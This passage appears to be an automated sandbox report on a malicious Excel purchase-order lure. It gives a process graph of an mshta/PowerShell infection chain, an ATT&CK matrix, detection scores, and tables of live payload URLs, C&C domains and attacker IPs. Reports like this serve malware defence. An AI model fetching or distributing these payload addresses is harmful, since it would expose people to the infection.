        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information121
        Scripting        		Valid Accounts121
        Command and Scripting Interpreter        		121
        Scripting        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Process Discovery        		Remote Services1
        Email Collection        		1
        Web Service        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts23
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		LSASS Memory21
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell        		Logon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager1
        Application Window Discovery        		SMB/Windows Admin Shares1
        Clipboard Data        		3
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Obfuscated Files or Information        		NTDS1
        Remote System Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Install Root Certificate        		LSA Secrets1
        File and Directory Discovery        		SSHKeylogging13
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials14
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1572123 Sample: Orden_de_Compra_Nmero_67829... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 92 Suricata IDS alerts for network traffic 2->92 94 Malicious sample detected (through community Yara rule) 2->94 96 Antivirus detection for URL or domain 2->96 98 15 other signatures 2->98 10 EXCEL.EXE 59 37 2->10         started        process3 dnsIp4 67 172.245.142.60, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 10->67 69 short.ruksk.com 54.150.207.131, 443, 49163, 49165 AMAZON-02US United States 10->69 59 Orden_de_Compra_Nm...82929219.xls (copy), Composite 10->59 dropped 61 matchingwithbestth...ignsevergive[1].hta, HTML 10->61 dropped 116 Microsoft Office drops suspicious files 10->116 15 mshta.exe 10 10->15         started        19 mshta.exe 10->19         started        21 AcroRd32.exe 27 10->21         started        file5 signatures6 process7 dnsIp8 84 short.ruksk.com 15->84 88 Suspicious command line found 15->88 90 PowerShell case anomaly found 15->90 23 cmd.exe 15->23         started        86 short.ruksk.com 19->86 26 cmd.exe 19->26         started        28 RdrCEF.exe 21->28         started        signatures9 process10 signatures11 108 Suspicious powershell command line found 23->108 110 Wscript starts Powershell (via cmd or directly) 23->110 112 PowerShell case anomaly found 23->112 30 powershell.exe 23 23->30         started        34 powershell.exe 26->34         started        process12 file13 63 kidsniceformetoget...rtimegivenmebes.vbS, Unicode 30->63 dropped 65 C:\Users\user\AppData\...\izhw321o.cmdline, Unicode 30->65 dropped 118 Installs new ROOT certificates 30->118 36 wscript.exe 1 30->36         started        39 csc.exe 2 30->39         started        42 wscript.exe 34->42         started        44 csc.exe 34->44         started        signatures14 process15 file16 100 Suspicious powershell command line found 36->100 102 Wscript starts Powershell (via cmd or directly) 36->102 104 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->104 106 Suspicious execution chain found 36->106 46 powershell.exe 12 4 36->46         started        55 C:\Users\user\AppData\Local\...\izhw321o.dll, PE32 39->55 dropped 49 cvtres.exe 39->49         started        51 powershell.exe 42->51         started        57 C:\Users\user\AppData\Local\...\24vqjdjh.dll, PE32 44->57 dropped 53 cvtres.exe 44->53         started        signatures17 process18 dnsIp19 71 paste.ee 46->71 74 res.cloudinary.com 46->74 76 cloudinary.map.fastly.net 46->76 78 paste.ee 51->78 80 151.101.1.137, 443, 49174 FASTLYUS United States 51->80 82 2 other IPs or domains 51->82 signatures20 114 Connects to a pastebin service (likely for C&C) 78->114

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Orden_de_Compra_Nmero_6782929219.xls13%ReversingLabs
        Orden_de_Compra_Nmero_6782929219.xls15%VirustotalBrowse
        Orden_de_Compra_Nmero_6782929219.xls100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://short.ruksk.com/BK100%Avira URL Cloudmalware
        http://172.245.142.60/#v0%Avira URL Cloudsafe
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFp0%Avira URL Cloudsafe
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFC:0%Avira URL Cloudsafe
        https://short.ruksk.com/der100%Avira URL Cloudmalware
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFdll0%Avira URL Cloudsafe
        https://short.ruksk.com/I100%Avira URL Cloudmalware
        https://short.ruksk.com/ILE100%Avira URL Cloudmalware
        http://172.245.142.60/0%Avira URL Cloudsafe
        http://172.245.142.60/466/kidsni0%Avira URL Cloudsafe
        https://short.ruksk.com/100%Avira URL Cloudmalware
        https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&ge100%Avira URL Cloudmalware
        https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift100%Avira URL Cloudmalware
        https://short.ruksk.com/3v100%Avira URL Cloudmalware
        http://go.cr0%Avira URL Cloudsafe
        http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta0%Avira URL Cloudsafe
        http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.0%Avira URL Cloudsafe
        http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        paste.ee
        		188.114.96.6
        		truefalse
          		high
          cloudinary.map.fastly.net
          		151.101.65.137
          		truefalse
            		high
            short.ruksk.com
            		54.150.207.131
            		truefalse
              		high
              res.cloudinary.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htatrue
                • Avira URL Cloud: safe
                		unknown
                https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshiftfalse
                • Avira URL Cloud: malware
                		unknown
                https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                  		high
                  http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://short.ruksk.com/Imshta.exe, 00000010.00000002.489097499.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030AD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://172.245.142.60/#vmshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://short.ruksk.com/ILEmshta.exe, 00000010.00000002.489097499.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030AD000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFdllpowershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.501255819.000000001AC91000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://short.ruksk.com/BKmshta.exe, 00000004.00000002.433647456.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://ocsp.entrust.net03mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgXpowershell.exe, 0000000D.00000002.508474117.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.547256956.0000000002210000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://172.245.142.60/mshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://172.245.142.60/466/kidsnipowershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://short.ruksk.com/dermshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFC:powershell.exe, 00000007.00000002.451390179.000000001C36D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.501649818.000000001C170000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://go.microspowershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIFppowershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://short.ruksk.com/mshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433647456.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://short.ruksk.com/3vmshta.exe, 00000004.00000003.426856568.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433675416.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002E36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002E36000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://res.cloudinary.compowershell.exe, 0000000D.00000002.508474117.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.547256956.0000000002210000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gemshta.exe, 00000010.00000002.488961722.000000000041E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.450451060.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.mshta.exe, 00000010.00000002.488933071.00000000003CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.444981624.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.508474117.0000000002171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.496191846.0000000002321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.547256956.0000000002011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C36D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451390179.000000001C3B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488426892.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488712932.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489097499.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430828741.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.429762798.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.451006989.000000001AA4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.475072703.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488280416.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.489126008.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.487116833.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.488787158.00000000030FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://go.crpowershell.exe, 00000007.00000002.451390179.000000001C33B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    151.101.1.137
                                                    		unknownUnited States
                                                    		54113FASTLYUStrue
                                                    172.245.142.60
                                                    		unknownUnited States
                                                    		36352AS-COLOCROSSINGUStrue
                                                    54.150.207.131
                                                    		short.ruksk.comUnited States
                                                    		16509AMAZON-02USfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1572123
                                                    Start date and time:2024-12-10 06:56:26 +01:00
